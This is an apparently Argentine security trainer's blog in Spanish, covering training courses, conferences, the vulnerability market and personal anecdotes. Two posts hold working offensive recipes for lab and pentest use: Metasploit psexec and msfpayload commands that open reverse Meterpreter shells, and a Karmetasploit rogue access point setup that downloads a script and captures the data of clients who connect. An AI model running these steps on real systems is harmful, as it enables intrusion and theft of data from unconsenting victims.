Entrenando un Ejército de Ninjas

Hoy termino una nueva edición del COMBAT training, con una audiencia cada vez mas numerosa, variada y técnica.

De izquierda a derecha, Ariel (USA), Alejandro, Marcos, Gabriel, (yo), Sebastián, Matías (Córdoba), Pablo (Tierra del Fuego) y Jerónimo. Faltan en la foto Fernando, y los amigos de Colombia, Hernando y Guillermo, que se tuvieron que ir antes.

Durante toda la semana del COMBAT training, los alumnos van sumando puntos en cada laboratorio que deben realizar, y también suman puntos en el CTF del ultima día. No deja de sorprenderme, como tímidamente a nadie le interesa "la sucia competencia" por los puntos durante los primeros días, para luego terminar la semana con sabotajes a la PC de los compañeros, amenazas y complots! :O

Bajo una gran presión, y temiendo por su integridad física, Matías Ochoa de Córdoba, fue el Ninja que se llevo la katana del COMBAT training!

Nuevamente Jerónimo Basaldua aplico todo su wi-foo durante el día de ayer en el módulo de Wireless Hacking. Esta vez no pude participar, por la charla que estuve dando en el CSIRT de Banelco, pero escuche que pasaron cosas peligrosas durante esas horas ;)

La semana que viene estaré dictando el COMBAT training en la ciudad de Rosario, el siguiente fin de semana estaré en PampaSeg, y luego tendremos el ultimo COMBAT training del año otra vez en Buenos Aires.

Charla en el CSIRT de Banelco

Durante la tarde de hoy participe como orador en un evento organizado por el CSIRT de Banelco con motivo de la Semana de la Seguridad Informática.

Realmente me sorprendió el excelente trabajo que esta realizando el CSIRT de Banelco, no solo dando respuesta a los incidentes de todos sus bancos adheridos, sino también con muchas otras acciones dirigidas a mejorar la seguridad de todas las organizaciones.

Despues de mi charla sobre ataques dirigidos del tipo client side, Pablo Carretino de Banelco, realizo una presentación sobre el trabajo del CSIRT en un incidente muy complejo del cual participaron que involucraba redes Fast Flux, y para finalizar Eduardo Carozo del CSIRT de Antel (Uruguay), realizo una presentación sobre el FIRST y la respuesta coordinada ante incidentes en el mundo.

Actualmente el CSIRT de Banelco esta siendo sponsoreado por el CSIRT de Antel y el ArCERT, que estuvo representado durante el evento por su coordinador Gastón Franco, para ingresar al FIRST.

Felicitaciones para Lucas Paus, Pato "el ninja" Castagnaro y Lucas Coronel por el excelente trabajo que están realizando! ;-)

Semana de la Seguridad Informática

Del próximo 23 al 30 de Noviembre comienza la Semana de la Seguridad Informática, una iniciativa creada para la realización de acciones de capacitación y/o concientización en la materia.

Estas acciones son de gran importancia para prevenir que miembros de nuestra organización puedan cometer errores que provoquen perdidas millonarias:

Durante la semana que viene voy a estar dictando el anteúltimo COMBAT training del 2009, y también voy a dar una charla en un evento organizado por el CSIRT de Banelco con motivo de la Semana de la Seguridad Informática.

Mostrame La Guita!

Una de las charlas mas interesantes de la ekoparty fue sin dudas la de Pedram Amini, titulada "Mostrame la Guita! Adventures in Buying Vulnerabilities", en donde Pedram nos conto algunas anécdotas y estadísticas del mercado de la compra/venta de vulnerabilidades.

"Guita", en el lunfardo rioplatense significa "dinero" (ver Wikipedia), y "Mostrame La Guita!" seria un paralelismo a la famosa frase "Show me The Money!".

La charla cubrio todo el circuito de la compra/venta de vulnerabilidades, pasando por los researchers, el mercado y los vendors. Pero en mi opinión lo mas interesante fue conocer un poco mas sobre quienes son los compradores, que hacen con lo que compran y cuanto pagan por ello.

Hoy en dia, hay una gran cantidad de prestigiosos researchers que se ganan la vida honestamente vendiendo las vulnerabilidades que descubren. Pero como en cualquier otro negocio, vamos a encontrar un mercado legal, un mercado negro, y otro con muchos grises.

Según "Mostrame la Guita!", el mercado se divide de la siguiente forma:

"White" Market:
- < 20.000 U$D:
- promedio entre 5.000 y 15.000 U$D

"Grey" Market:
.gov resellers:
- promedio entre 20.000 y 100.000 U$D
.gov:
- entre 100.000 y 1.000.000 U$D
- promedio es < 250.000

"Black" Market:
- 20.000 - 100.000 U$D
- cambios de precio a ultimo momento

Siempre me costo entender que gana el "White" Market comprando vulnerabilidades. Algunos de las razones son las siguientes:

- Suscripción anual para clientes que pagan por enterarse primero (sin detalles/sin PoC).
- Productos de seguridad que crean mayor protección contra estos ataques, como firmas para un IDS/IPS por ejemplo.
- Monitoreo mundial de explotaciones con 0-days.
- Reventa de las vulnerabilidades.

En el "Gray" Market, encontramos a gobiernos y a intermediarios de gobiernos. Puede pasar que el researcher no obtenga crédito por su descubrimiento, que se exija un PoC que explote la vulnerabilidad, que el Vendor nunca sea contactado ni tampoco se publique un advisory, y por supuesto que nunca sepamos que se planea hacer con todo eso. Pero claro, se paga mucho mas (hasta 1.000.000 U$D!)

El "Black" Market no hace falta comentarlo ;) Pero todo esto es solo un apice de lo que podemos encontrar en la presentación de Pedram, les recomiendo leerla en profundida, ver las "Notas del Presentador" en Google Docs, y también leer un documento de Charlie Miller llamado "The Legitimate Vulnerability Market", también sobre la misma temática.

Finalizando, me fascino esta presentación, aunque me hubiera sorprendido aun mucho mas, si en vez de llamarse "Mostrame La Guita!", se hubiera llamado "Che boludo, Mostrame La Guita!" :P

FUENTES:
- Presentación "Mostrame La Guita!" en Google Docs
- DVLabs Blog: "Mostrame La Guita!"
- DVLabs Blog: Ekoparty Wrap Up
- Wikipedia: Guita

Seguridad de los nuevos DNI Argentinos

En el blog de Matt me encontré con un interesante video de La Nación que relata las medidas de seguridad de los nuevos DNI Argentinos.

Casualmente, hace alrededor de 1 mes inicie los tramites para obtener un nuevo DNI porque me perdieron el anterior (si Gesolmina, fuistes vos!), obviamente esperaba tener mi documento para el 2011, con suerte. Pero increíblemente, a solo unos días del anuncio de los nuevos DNI, hoy llego Correo Argentino a traerme mi nuevo documento!

Ahora, yo no puedo tener mas mala suerte, el cartero me pedía un "papelito" que supuestamente me dieron cuando realice el tramite, y como no se donde deje ese papelito, no me entrego el DNI... aaaarrgggggggHHH!!!

PampaSeg en Diciembre

El próximo 4 y 5 de Diciembre tendrán lugar las Jornadas de Software Libre y Seguridad Informatica en La Pampa.

El evento es abierto a toda la comunidad, con entrada libre y gratuita. El cupo es limitado a unas 100 personas aproximadamente, por lo cual se requerirá una pre-acreditación desde la web http://www.pampaseg.com

Voy a tener el gusto de dar una charla en este evento, asi que si estan por La Pampa por esas fechas nos vemos alli!

Prefetch en Meterpreter

Siempre me llama la atención la integración de técnicas forenses y anti-forenses al Penetration Testing, como el reciente script para Meterpreter que permite obtener los datos de Prefetch.

¿ Que es Prefetch ?

Cada vez que abrimos una aplicación en Windows se crea un archivo ".pf" en el directorio (%SYSTEMROOT%\Prefetch\), este archivo contiene información para acelerar las aplicaciones que seran abiertas en el futuro.

Dentro del archivo .pf podemos encontrar la fecha y hora en la que el archivo fue abierto, modificado o accedido por ultima vez, y también la cantidad de veces que este fue ejecutado.

El nombre del archivo .pf se arma "NOMBRE-HASH.pf", en donde el HASH se calcula con el path del lugar en donde se encontraba el archivo, por lo que si este fue ejecutado de 2 lugares diferentes, vamos a tener 2 archivos .pf diferentes.

Durante un Penetration Test, conocer cuales son los programas mas utilizados en un sistema nos puede ayudar a identificar los hábitos del administrador o el rol de este sistema en la red.

Hay una herramienta gratuita llamada Windows File Analyzer que nos permite visualizar el contenido de los archivos Prefetch:

Shell con Meterpreter

A continuación dos formas sencillas de obtener una shell con meterpreter sin necesidad de explotar una vulnerabilidad.

El siguiente modulo es similiar al "psexec" de SysInternals, y si le proveemos el user/pass de la víctima, nos permitira ejecutar un "payload":

use windows/smb/psexec
set PAYLOAD windows/metepreter/reverse_tcp
set RHOST 192.168.13.129
set LHOST 192.168.13.131
set SMBUser Administrador
set SMBPass password
exploit

Otra forma, es crear un binario con el payload, lo transferimos a la víctima, luego dejamos escuchando por la conexión reversa y ejecutamos el binario para generar la conexión con meterpreter:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.13.131 X > meterpreter.exe

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.13.131 E

Prefetch con Meterpreter

Para utilizar Prefetch primero deberíamos actualizar Metasploit (esto hacerlo antes de obtener la shell):

cd /pentest/exploits/framework3
svn update

./msfconsole
run prefetchtool -h

Si es la primera vez que utilizamos Prefetch, el script bajara "prefetch.exe" del repositorio, para luego subirlo y ejecutarlo en la víctima. A continuación listamos los 5 programas mas utilizados en la víctima con el comando "run prefetchtool -x 5":

Otra feature interesante dentro de meterpreter es "timestomp", que nos permite modificar la fecha de creación, modificación y ultimo acceso de los archivos, pero eso lo dejo para otro post... ;)

FUENTES:
- Milo2012's Security Blog: Meterpreter Script for Prefetch-Tool
- Laramies Corner: Windows Prefetcher and forensic analysis
- Windows File Analyzer
- PaulDotCom - Episode 171
- What is the Prefetcher?
- Forensics Wiki - Prefetch

Una Final Dramática!

El día de ayer termino el COMBAT training (extended edition) con una final dramática en el CTF "Capture The Flag"!

La versión extendida del COMBAT training se dicto 1 día por semana, durante 5 semanas, e iba dirigida a quienes no podían tomarse una semana completa de training.

Quiero felicitar a Patricio Castagnaro quien gano el CTF y se llevo la espada ninja, y también a Diego Nadares que dio una gran pelea en todo momento! También extender las felicitaciones a Esteban Piloni y Sergio "Moises" Veron por el gran trabajo durante toda la semana!

Como siempre los premios del COMBAT training son armas orientales, esta vez teníamos la espada ninja para el primer lugar, un set de cuchillos para lanzar para el segundo y estrellas ninjas para el resto.

Jeronimo Basaldua, el experto en Wireless Security de BASE4, dicto el modulo de Wireless Hacking del COMBAT training.

Lamentablemente Jeronimo sufrió un accidente manipulando la espada (miren su frente en la foto grupal), al parecer Jeronimo estudiaba kendo unos años atras y en una maniobra poco afortunada durante el training se corto a si mismo... :?

Por consultas sobre el COMBAT training contactarse a capacitacion@base4sec.com

Karmetasploit en BackTrack 4

Actualizando algunos labs del COMBAT training para BackTrack 4, aquí les dejo algunas notas para jugar con Karmetasploit.

- Ponemos la placa en modo monitor:

airmon-ng start wlan0


- Levantamos el Access Point falso en la interfaz en modo
monitor:

airbase-ng -P -C 30 -e “Linksys” -v mon0


- Configuramos el rango de IPs que entregara el servidor
DHCP:

nano /etc/dhcp3/dhcpd.conf

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.140 10.0.0.240;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}


- Configuramos la IP en la interfaz que creo airbase-ng:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0


- Levantamos el DHCP que le entregara las IPs a las
victimas que se conecten al Access Point falso:

/etc/init.d/dhcp3-server start


- Vemos las IPs que entrega el DHCP:

tail -f /var/log/messages


- Bajamos el script de Karma y corremos Metasploit:

cd /pentest/exploits/framework3

wget http://digitaloffense.net/tools/karma.rc

./msfconsole -r karma.rc


- Podemos obtener los datos guardados en karma.db
de esta forma:

sqlite3 karma.db
.tables
select * from notes;
.quit

Tres Minutos de Furia

Hoy tuvo lugar la 2a fecha del Torneo Argentino de Paintball y pase la tarde como "utilero" del equipo LOD (Legion of Doom), unos amigos que competían.

Todavía me acuerdo de los comienzos de LOD y ese famoso partido en Urban Paintball donde nos robaron de comienzo a fin... :P

Go Go Go LOD! Vamos por la tercer fecha! ;-)